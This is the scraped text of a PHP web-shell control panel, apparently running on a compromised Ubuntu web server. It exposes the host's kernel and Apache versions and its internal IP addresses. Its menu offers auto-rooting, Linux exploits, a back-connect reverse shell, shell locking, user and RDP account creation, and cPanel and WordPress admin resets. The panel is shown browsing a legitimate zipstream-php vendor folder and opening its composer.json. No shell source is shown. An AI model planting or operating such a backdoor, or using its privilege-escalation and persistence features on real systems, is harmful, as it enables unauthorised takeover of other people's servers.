Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
vendor /
maennchen /
zipstream-php /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-x--x
src
[ DIR ]
drwxr-x--x
test
[ DIR ]
drwxr-x--x
.gitignore
66
B
-rwxr-x--x
.travis.yml
296
B
-rwxr-x--x
CHANGELOG.md
1.5
KB
-rwxr-x--x
CONTRIBUTING.md
556
B
-rwxr-x--x
LICENSE
1.24
KB
-rwxr-x--x
README.md
6.54
KB
-rwxr-x--x
composer.json
957
B
-rwxr-x--x
phpunit.xml.dist
439
B
-rwxr-x--x
psalm.xml
1.86
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "maennchen/zipstream-php", "description": "ZipStream is a library for dynamically streaming dynamic zip files from PHP without writing to the disk at all on the server.", "keywords": ["zip", "stream"], "type": "library", "license": "MIT", "authors": [{ "name": "Paul Duncan", "email": "pabs@pablotron.org" }, { "name": "Jonatan Männchen", "email": "jonatan@maennchen.ch" }, { "name": "Jesse Donat", "email": "donatj@gmail.com" }, { "name": "András Kolesár", "email": "kolesar@kolesar.hu" } ], "require": { "php": ">= 7.1", "symfony/polyfill-mbstring": "^1.0", "psr/http-message": "^1.0", "myclabs/php-enum": "^1.5" }, "require-dev": { "phpunit/phpunit": ">= 7.5", "guzzlehttp/guzzle": ">= 6.3", "ext-zip": "*", "mikey179/vfsstream": "^1.6" }, "autoload": { "psr-4": { "ZipStream\\": "src/" } } }
Close